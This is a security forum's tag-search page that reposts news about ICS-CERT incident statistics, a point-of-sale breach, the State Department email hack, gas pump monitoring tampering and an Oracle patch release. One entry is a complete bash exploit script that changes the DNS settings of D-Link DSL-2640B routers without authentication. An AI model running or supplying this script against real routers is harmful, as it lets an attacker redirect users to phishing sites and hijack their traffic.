Search the Community
Showing results for tags 'systems'.
-
Dissecting the Linux/Moose malware http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf ( PDF ) Download Source
- 2 replies
-
- embedded
- linux-based
-
(and 3 more)
Tagged with:
-
US industrial control systems were hit by cyber attacks at least 245 times over a 12-month period, the US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has revealed. The figure was included in a report by the ICS-CERT, which operates within the National Cybersecurity and Integration Center, itself a part of the Department of Homeland Security. The report is classed as covering the 2014 fiscal year which, under US government dates, was between 1 October 2013 and 30 September 2014. “ICS-CERT received and responded to 245 incidents reported by asset owners and industry partners,” the report said. The energy sector accounted for the most incidents at 79, but perhaps the more alarming figure is that 65 incidents concerned cyber infiltration of the manufacturers of ICS hardware. “The ICS vendor community may be a target for sophisticated threat actors for a variety of reasons, including economic espionage and reconnaissance,” the report said. The data below shows the various industries that ICS-CERT was called on to help. The group said that 55 percent of investigated incidents showed signs that advanced persistent threats had been used to breach systems. “Other actor types included hacktivists, insider threats and criminals. In many cases, the threat actors were unknown due to a lack of attributional data,” it added. The graph below shows the various forms of attack methods uncovered by the ICS-CERT, although worryingly the vast majority of attacks were untraceable. The ICS-CERT did reveal, however, that some of its work related to hacks that used the Havex and Black Energy malware revealed during 2014. “ICS-CERT has provided onsite and remote assistance to various critical infrastructure companies to perform forensic analysis of their control systems and conduct a deep dive analysis into Havex and Black Energy malware,” it said. The ICS-CERT also acknowledged that it is highly likely that it was unaware of other incidents that will have occurred during the period. “The 245 incidents are only what was reported to ICS-CERT, either by the asset owner or through relationships with trusted third-party agencies and researchers. Many more incidents occur in critical infrastructure that go unreported,” the report said. The report comes amid rising concerns that industrial control systems are being targeted by Russian hackers, who are seen as new and highly sophisticated players in the cyber arena. Source
-
Michigan-based provider of point-of-sale devices, NEXTEP SYSTEMS, is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS. “NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised,” according to the statement, which goes on to add, “We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed.” An investigation is ongoing with law enforcement and data security experts. On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS. Source
-
- customer
- enforcement
-
(and 3 more)
Tagged with:
-
Top operating systems by vulnerabilities reported in 2014 Top applications by vulnerabilities reported in 2014 Most vulnerable operating systems and applications in 2014
- 13 replies
-
- applications
- operating
-
(and 6 more)
Tagged with:
-
Email servers still compromised after THREE months An attack against US State Department servers is still ongoing three months after the agency spotted miscreants inside its email system, it's reported. In November the State Department was forced to suspend its unclassified email systems after it was successfully infiltrated by hackers unknown. At the time the agency said its classified emails were unaffected by the hack. Now Bloomberg and the Wall Street Journal report multiple sources saying that the attack is still ongoing: the bad guys and girls still have remote access to internal computers. Every time sysadmins find and delete a malware infection, installed by the hackers, another variant pops up. The point of failure was, we're told, a user clicking on a link to a dodgy website using an unpatched browser, leading to malicious remote-code execution. Once inside the network, the attackers spread out to the department's computers overseas, many of which now harbor malware. Remote access to email inboxes has been disabled, it's reported. IT staff can't switch off the network to freeze the infection because the computer systems must remain operation for security reasons. Five sources report that the attacks are Russian in origin, with one former US intelligence officer claiming that Putin’s online warriors are just as good as Uncle Sam's. The secure email system is reportedly still safe, but unclassified emails can contain lots of juicy information – and hackers could masquerade as officials on the network to gain access to more sensitive documents. Messages regarding US policy on the Ukraine, and other files, have been swiped from the system, two sources report. The difficulty in blocking further attacks raises worrying possibilities for the rest of the government’s IT managers. The State Department’s servers was compromised as part of large-scale attack against US government systems, with the White House, the US Postal Service, and the National Weather Service all falling prey, albeit briefly. “We deal successfully with thousands of attacks every day,” State Department spokeswoman Marie Harf told the Journal in a statement. “We take any possible cyber intrusion very serious - as we did with the one we discussed several months ago — and we deal with them in conjunction with other relevant government agencies.” Given the amount the US spends on information security these days it seems amazing that the NSA can’t rustle up a few of its hackers so adept at attacking and subverting legitimate means of communications and focus on defense for a change. Since 2001 the US has publicaly spent over $500bn on its intelligence services, and documents leaked by Edward Snowden show the NSA and CIA spent over $25bn in 2013 alone. It doesn’t seem as though the American taxpayer is getting value for money. Source
-
- department
-
(and 3 more)
Tagged with:
-
#!/bin/bash # # D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit # # Copyright 2015 (c) Todor Donev <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Description: # Different D-Link Routers are vulnerable to DNS change. # The vulnerability exist in the web interface, which is # accessible without authentication. # # Tested firmware version: EU_2.03 # ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link # DEVICES OR FIRMWARE VERSIONS MAY AFFECTED. # # Once modified, systems use foreign DNS servers, which are # usually set up by cybercriminals. Users with vulnerable # systems or devices who try to access certain sites are # instead redirected to possibly malicious sites. # # Modifying systems' DNS settings allows cybercriminals to # perform malicious activities like: # # o Steering unknowing users to bad sites: # These sites can be phishing pages that # spoof well-known sites in order to # trick users into handing out sensitive # information. # # o Replacing ads on legitimate sites: # Visiting certain sites can serve users # with infected systems a different set # of ads from those whose systems are # not infected. # # o Controlling and redirecting network traffic: # Users of infected systems may not be granted # access to download important OS and software # updates from vendors like Microsoft and from # their respective security vendors. # # o Pushing additional malware: # Infected systems are more prone to other # malware infections (e.g., FAKEAV infection). # # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use them at your own risk! # if [[ $# -gt 3 || $# -lt 2 ]]; then echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit" echo " ================================================================" echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>" echo " Example: $0 192.168.1.1 8.8.8.8" echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4" echo "" echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>" echo " http://www.ethical-hacker.org/" echo " https://www.facebook.com/ethicalhackerorg" exit; fi GET=`which GET 2>/dev/null` if [ $? -ne 0 ]; then echo " Error : libwww-perl not found =/" exit; fi GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1 Source
-
Hackers – possibly affiliated with Anonymous – have already attacked at least one internet-connected gas (petrol) station pump monitoring system. Evidence of malfeasance, uncovered by Trend Micro, comes three weeks after research about automated tank gauge vulnerabilities from Rapid7, the firm behind Metasploit. Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill). The technology can also be used to perform leak tests. ATGs are used by nearly every fuelling station in the United States and tens of thousands of systems internationally. ATGs can typically be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. In order to facilitate remote monitoring over the internet, ATG serial interfaces are often mapped to an internet-facing port. This opens door to potential trouble, especially since serial interfaces are rarely password protected. Rapid7 estimates that 5,800 ATGs are exposed to the internet without a password. Over 5,300 of these ATGs are located in the US. Put another way, around one in 30 of the 150,000 fuelling stations in the country are exposed to attack, leaving the door open to all sorts of mischief. “An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system,” Rapid7’s HD Moore warns. “Tank gauge malfunctions are considered a serious issue due to the regulatory and safety issues that may apply." But what’s actually happening at the pump? Independent researcher Stephen Hilt and Kyle Wilhoit, a senior threat researcher at Trend Micro, teamed up to investigate whether or not attackers were actively attempting to compromise these internet-facing gas pump monitoring systems. In particular the duo looked at deployments of the Guardian AST Monitoring System, internet-ready kit designed to monitor inventory, pump levels, and assorted values of pumping systems typically found in gas stations. Shodan, the well-known search engine for Internet-connected devices, and popular port-scanning tool Nmap create a ready mechanism for interested parties to hunt for inter-connected petrol pump kit. Hilt and Wilhoit discovered more than 1,515 vulnerable gas pump monitoring devices worldwide, less than a third of the figure logged by HD Moore last month. That would be reason for cautious optimism – except that the duo also uncovered evidence of tampered Guardian AST devices. The US-located system, left wide open on the net, had been hacked, apparently by mischief-makers, referencing one of ragtag hacker group Anonymous’s favourite catch phrases. An attacker had modified one of these pump-monitoring systems in the US. This pump system was found to be internet facing with no implemented security measures. The pump name was changed from “DIESEL” to “WE_ARE_LEGION.” The group Anonymous often uses the slogan “We Are Legion,” which might shed light on possible attributions of this attack. But given the nebulous nature of Anonymous, we can’t necessarily attribute this directly to the group. An outage of these pump monitoring systems, while not catastrophic, could cause serious data loss and supply chain problems. For instance, should a volume value be misrepresented as low, a gasoline truck could be dispatched to investigate low tank values. Empty tank values could also be shown full, resulting in gas stations having no fuel. The insecure gas pump monitoring system issue is part of the wider problem of insecure SCADA (industrial control) devices. “Our investigation shows that the tampering of an internet-facing device resulted in a name change,” a blog post by Trend Micro on the research concludes. “But sooner or later, real world implications will occur, causing possible outages or even worse. Hopefully, with continued attention to these vulnerable systems, the security profile will change. Ideally, we will start seeing secure SCADA systems deployed, with no Internet facing devices. Source
-
- gas
- monitoring
-
(and 3 more)
Tagged with:
-
Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers. The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available. "The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory. "Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible." Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important. "This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said. "Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password." The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable. The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited. The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle. The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications. The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft. Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug. Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure. Source